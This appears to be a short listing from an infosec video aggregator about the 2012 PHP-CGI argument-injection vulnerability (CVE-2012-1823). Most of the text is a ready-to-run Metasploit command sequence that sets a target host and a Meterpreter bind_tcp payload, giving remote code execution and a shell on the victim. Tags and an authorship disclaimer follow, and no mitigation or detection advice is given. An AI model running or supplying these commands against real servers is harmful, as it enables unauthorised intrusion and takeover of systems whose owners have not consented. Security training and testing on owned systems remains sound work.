Description: A PHP-CGI vulnerability was pubished this month (http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/) that results in source code disclosure and remote code execution.
You can use Metasploit to exploit this vulneraiblity like this:
use exploit/multi/http/php_cgi_arg_injection
set rhost objetivo
set PAYLOAD php/meterpreter/bind_tcp
exploit
Tags: metasploit , msf , exploit , vulnerability , php-cgi , phpcgi , cgi , php , exploitation , vuln , websec ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.